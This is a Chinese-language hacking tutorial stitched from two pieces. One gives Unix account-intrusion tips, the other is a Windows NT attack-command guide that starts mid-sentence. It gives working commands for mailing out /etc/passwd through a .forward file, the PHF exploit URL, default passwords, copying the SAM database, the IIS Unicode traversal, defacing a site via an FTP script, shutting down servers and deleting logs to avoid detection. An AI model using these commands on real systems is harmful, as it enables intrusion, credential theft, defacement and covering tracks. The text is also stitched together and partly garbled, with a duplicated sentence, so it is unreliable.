我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.           确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x，做一个.foward文件传上去，在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信，它会把PASSWD发给你。           如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用.           以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-<           还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!           很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:           帐号　　　　 密码     ----------- ----------------     root　　　　root     sys　　　 　sys/system/bin     bin　　　　 sys/bin     mountfsys　 mountfsys     adm　　　　 adm     uucp　　　　uucp     nuucp　　　 anon     anon　　　　anon     user　　　　user     games　　　 games     install　　 install     reboot　　　给 "command login" 用的     demo　　　　demo     umountfsys　umountfsys     sync　　　　 sync     admin　　　 admin     guest　　　 guest     daemon　　　daemon     ________________________________________________________________           有些管理员忘记把他们改掉,那你就发财了!           另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.           只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:           .........           xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh           qingyuan:x:275:50::/usr/qingyuan:/bin/sh           hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh           smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh           kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh           brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh           tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh           ............           这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.           如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.           当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的.           如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.           最后实在不行还有一种比较卑劣的手段，就是给该网站的网管写封信，想办法骗他执行特洛伊木马，然后再.......算了,不说了.           你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我

put c:index.htm d: 5:copy 下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好IPC$连接才有效。 这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下 copy index.htm \127.0.0.1c$index.htm ---------------------- 如果你要复制到D盘下把C改为D，就行了！ copy index.htm \127.0.0.1d$index.htm ---------------------- 如果你要把他复制到WINNT目录里 就要把输入 copy index.htm \127.0.0.1admin$index.htm admin$是winnt ---------------------- 要把对方的文件复制过来，顺便告诉大家NT的备份的数据库放在x:winnt epairsam._ sam._是数据库的文件名 下面就把127.0.0.1的数据库复制到本地C盘下 copy \127.0.0.1admin$ epairsam._ c: ---------------------- 6∶set 如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的80端口要开，不然你黑给谁看。这时需要用SET命令！ 下面是我得到的结果！我来分析它，只是找主页在那而已。 COMPUTERNAME=PENTIUMII ComSpec=D:WINNTsystem32cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=*/* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST=当前登陆者的IP，这里本来是显示我的IP，被我删除了 HTTP_ACCEPT_ENCODING=gzip, deflate HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) NUMBER_OF_PROCESSORS=1 Os2LibPath=D:WINNTsystem32os2dll; OS=Windows_NT Path=D:WINNTsystem32;D:WINNT PATHEXT=.COM;.EXE;.BAT;.CMD PATH_TRANSLATED=E:vlroot主页放在的地址，只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:vlroot PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=0303 PROMPT=$P$G QUERY_STRING=/c+set REMOTE_ADDR=XX.XX.XX.XX REMOTE_HOST=XX.XX.XX.XX REQUEST_METHOD=GET script_NAME=/scripts/..%2f../winnt/system32/cmd.exe SERVER_NAME=XX.XX.XX.XX SERVER_PORT=80 SERVER_PORT_SECURE=0 SERVER_PROTOCOL=HTTP/1.1 SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0 SystemDrive=D: SystemRoot=D:WINNT TZ=GMT-9 USERPROFILE=D:WINNTProfilesDefault User windir=D:WINNT 粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧啊，不过只能用这个方法才能100%的找到主页的名称，当你DIR这个目录时，一定会看到很多文件，你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名，这样只要看到和XX.XX.XX.XX看到的也面一模一样，那厶这就是主页的名称了。 7∶nbtstat 如果你扫到一部NT的机子，他的136到139其中一个端口开了的话，就要用这个命令得到用户了。QQ:9750406顺便告诉大家这是netbios，得到用户名后就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力破解吧！ 现在网上很多NT的机子都开了这些端口的，你可以练习下，我们来分析得到的结果。 命令是 nbtstat -A XX.XX.XX.XX -A一定要大写哦。 下面是得到的结果。 NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered MAC Address = 00-E0-29-14-35-BA PENTIUMII <00> UNIQUE PENTIUMII <20> UNIQUE ORAHOTOWN <00> GROUP ORAHOTOWN <1C> GROUP ORAHOTOWN <1B> UNIQUE PENTIUMII <03> UNIQUE INet~Services <1C> GROUP IS~PENTIUMII...<00> UNIQUE ORAHOTOWN <1E> GROUP ORAHOTOWN <1D> UNIQUE ..__MSBROWSE__.<01> GROUP 粉红色的就是登陆过这部系统的用户，可能你不知道怎厶看，大家是不是看到了一窜数字，只要这窜数字是<03>的话，那他前面的就是用户。 这里的用户是PENTIUMII。 8∶Shutdown 关了对方的NT服务器的命令 Shutdown \IP地址 t:20 20秒后将NT自动关闭，三思后才能运行这个命令，这样对对方造很大的损失，要做个有良心的入侵者呀。 9∶DIR 这个命令没什厶好讲，但是却非常重要，他是查看一目录里的所有文件、文件夹。 你可以本地试下。 10∶echo 著名的漏洞Unicode，这个命令可以简单的黑一下有这个漏洞的主机。 我们假设我们要把“南京大屠杀铁证如山，任何日本人不得抵赖！”写入index.htm，有2种方法，大家看看有什厶区别。 echo 南京大屠杀铁证如山，任何日本人不得抵赖！>index.htm echo 南京大屠杀铁证如山，任何日本人不得抵赖！>>index.htm 第一个的意思是覆盖index.htm原有的内容，把“南京大屠杀铁证如山，任何日本人不得抵赖！”写进index.htm。 第二个的意思是把“南京大屠杀铁证如山，任何日本人不得抵赖！”加到index.htm里面。 “>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。 大家可以本地试下。 可能你会问，这样简单黑下有什厶好玩的，其实他可以用来下载主页到对方的目录里。 1、首先，我们需要申请一个免费的主页空间。 2、用echo在可写目录下建立如下内容的txt文件∶（以chinren服务器为例。） open upload.chinaren.com（你的FTP服务器，申请时你的空间提供商会给你的） cnhack（你申请时的用户名） test（你申请时的密码） get index.htm c:inetpubwwwrootindex.htm（这里是把你空间上的index.htm下载到对方的c:inetpubwwwrootindex.htm） bye（退出FTP对话，相当在98下的DOS，用EXIT退出DOS） 具体的做法∶ 输入 echo open upload.chinaren.com> c:cnhack.txt 输入 echo cnhack >> c:cnhack.txt 输入 echo 39abs >> c:cnhack.txt 输入 echo get index.htm c:inetpubwwwrootindex.htm+>>+c:cnhack.txt 最后输入 ftp -s:c:cnhack.txt （利用ftp的-s参数，执行文件里的内容。） 等命令完成时，文件已经下载到你指定的文件里了。 注意∶取得文件后，请删除cnhack.txt。（如果不删除，很容易会给别人看到你的密码。） 记得要 del c:cnhack.txt 11:attrib 这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不行。倒！不过有这个命令就别怕了。 attrib -r index.htm 这个命令是把index.htm的只读属性去掉。 如果把“-”改为“+”则是把这个文件的属性设置为只读 ---------------------- attrib +r index.htm 这个命令是把index.htm的属性设置为只读。 12:del 当你看到这个标题可别倒下啊！现在要离开127.0.0.1了，要删除日志，当然要删除日志啦！想被捉吗。呵呵。 NT的日志有这些 del C:winntsystem32logfiles*.* del C:winntssytem32config*.evt del C:winntsystem32dtclog*.* del C:winntsystem32*.log del C:winntsystem32*.txt del C:winnt*.txt del C:winnt*.log 只要删除这些就可以了。有些系统NT安装在D盘或其他盘，就要把C改成其他盘 是否能懂，不懂的话联系我：itfk121@163.com